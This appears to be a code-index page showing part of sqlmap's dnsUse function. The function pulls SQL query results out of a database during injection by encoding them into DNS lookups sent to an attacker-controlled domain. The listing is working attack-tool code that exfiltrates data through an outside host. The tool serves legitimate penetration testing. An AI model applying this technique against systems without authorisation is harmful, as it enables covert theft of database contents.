MCPcopy Index your code
hub / github.com/sqlmapproject/sqlmap / dnsUse

Function dnsUse

lib/techniques/dns/use.py:37–119  ·  view source on GitHub ↗

Retrieve the output of a SQL query taking advantage of the DNS resolution mechanism by making request back to attacker's machine.

(payload, expression)

Source from the content-addressed store, hash-verified

35from lib.utils.safe2bin import safecharencode
36
37def dnsUse(payload, expression):
38 """
39 Retrieve the output of a SQL query taking advantage of the DNS
40 resolution mechanism by making request back to attacker's machine.
41 """
42
43 start = time.time()
44
45 retVal = None
46 count = 0
47 offset = 1
48
49 if conf.dnsDomain and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL):
50 output = hashDBRetrieve(expression, checkConf=True)
51
52 if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None:
53 output = None
54
55 if output is None:
56 kb.dnsMode = True
57
58 while True:
59 count += 1
60 prefix, suffix = ("%s" % randomStr(length=3, alphabet=DNS_BOUNDARIES_ALPHABET) for _ in xrange(2))
61 chunk_length = MAX_DNS_LABEL // 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL // 4 - 2
62 _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)
63 nulledCastedField = agent.nullAndCastField(fieldToCastStr)
64 extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(fieldToCastStr), expression).group(0)
65 if extendedField != fieldToCastStr: # e.g. MIN(surname)
66 nulledCastedField = extendedField.replace(fieldToCastStr, nulledCastedField)
67 fieldToCastStr = extendedField
68 nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length)
69 nulledCastedField = agent.hexConvertField(nulledCastedField)
70 expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
71
72 expressionRequest = getSQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsDomain)
73 expressionUnescaped = unescaper.escape(expressionRequest)
74
75 if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL):
76 query = agent.prefixQuery("; %s" % expressionUnescaped)
77 query = "%s%s" % (query, queries[Backend.getIdentifiedDbms()].comment.query)
78 forgedPayload = agent.payload(newValue=query)
79 else:
80 forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3)))
81
82 Request.queryPage(forgedPayload, content=False, noteResponseTime=False, raise404=False)
83
84 _ = conf.dnsServer.pop(prefix, suffix)
85
86 if _:
87 _ = extractRegexResult(r"%s\.(?P<result>.+)\.%s" % (prefix, suffix), _, re.I)
88 _ = decodeDbmsHexValue(_)
89 output = (output or "") + _
90 offset += len(_)
91
92 if len(_) < chunk_length:
93 break
94 else:

Callers 2

_goDnsFunction · 0.90
dnsTestFunction · 0.90

Calls 15

hashDBRetrieveFunction · 0.90
randomStrFunction · 0.90
getSQLSnippetFunction · 0.90
safeStringFormatFunction · 0.90
randomIntFunction · 0.90
extractRegexResultFunction · 0.90
decodeDbmsHexValueFunction · 0.90
dataToStdoutFunction · 0.90
safecharencodeFunction · 0.90
hashDBWriteFunction · 0.90
calculateDeltaSecondsFunction · 0.90
singleTimeWarnMessageFunction · 0.90

Tested by 1

dnsTestFunction · 0.72

Used in the wild real call sites across dependent graphs

searching dependent graphs…